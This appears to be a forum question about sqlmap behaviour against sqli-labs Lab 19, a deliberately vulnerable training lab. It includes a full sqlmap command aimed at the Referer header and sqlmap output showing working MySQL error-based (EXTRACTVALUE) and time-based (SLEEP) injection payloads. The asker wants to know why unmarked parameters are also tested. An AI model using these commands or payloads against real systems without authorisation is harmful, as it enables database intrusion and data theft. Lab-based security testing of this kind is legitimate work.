In accordance with the sqlmap usage documentation, I am attempting to utilize the * symbol as an injection point to conduct a SQL injection attack using sqlmap. Specifically, I am testing this approach on a vulnerable lab, Lab19 within sqli-labs.
Within this lab, there is a Referer-vulnerable header. My sqlmap run command is as follows:
sqlmap \
--method=POST \
--batch \
--flush-session \
--fresh-queries \
--banner \
--risk=3 \
--level=5 \
--drop-set-cookie \
--results-file=/dev/null \
--ignore-code=* \
--skip-waf \
--har=remotelabs.har \
-H 'Referer: https://sqli-labs-domain.app*' \
--answers=follow=Y,inside=Y,continue=Y,those=N,non-custom=N \
-u "https://sqli-labs-domain.app/Less-19/" \
--data 'uname=admin&passwd=admin&submit=Submit'
In some cases, the execution proceeds rather quickly(around 1600 requests) and successfully identifies a vulnerability:
Parameter: Referer #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: ' AND EXTRACTVALUE(6954,CONCAT(0x5c,0x7171706271,(SELECT (ELT(6954=6954,1))),0x716b707671)) AND 'FjuT'='FjuT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ' AND (SELECT 5593 FROM (SELECT(SLEEP(30)))ZeqH) AND 'OMvC'='OMvC
---
However, sometimes, it considers it as a false positive and continues attacking other parameters that were not marked for injection:
[21:55:00] [INFO] (custom) HEADER parameter 'Referer #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
...
[22:03:07] [WARNING] false positive or unexploitable injection point detected
[22:03:07] [WARNING] (custom) HEADER parameter 'Referer #1*' does not seem to be injectable
...
[22:03:07] [INFO] testing if POST parameter 'uname' is dynamic
[22:03:08] [INFO] POST parameter 'uname' appears to be dynamic
[22:03:08] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[22:03:08] [INFO] testing for SQL injection on POST parameter 'uname'
[22:03:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
...
After a long duration (over 10,000 requests), it eventually fails with:
[23:37:08] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
I suspect that the consideration of the Referer as a false positive may be due to unstable target behavior. However, I am confusing as to why sqlmap is attacking parameters that were not marked as injection points (*)? Is this behavior expected, or could it be a bug? If it is expected behavior, how can I prevent sqlmap from attacking non-marked parameters?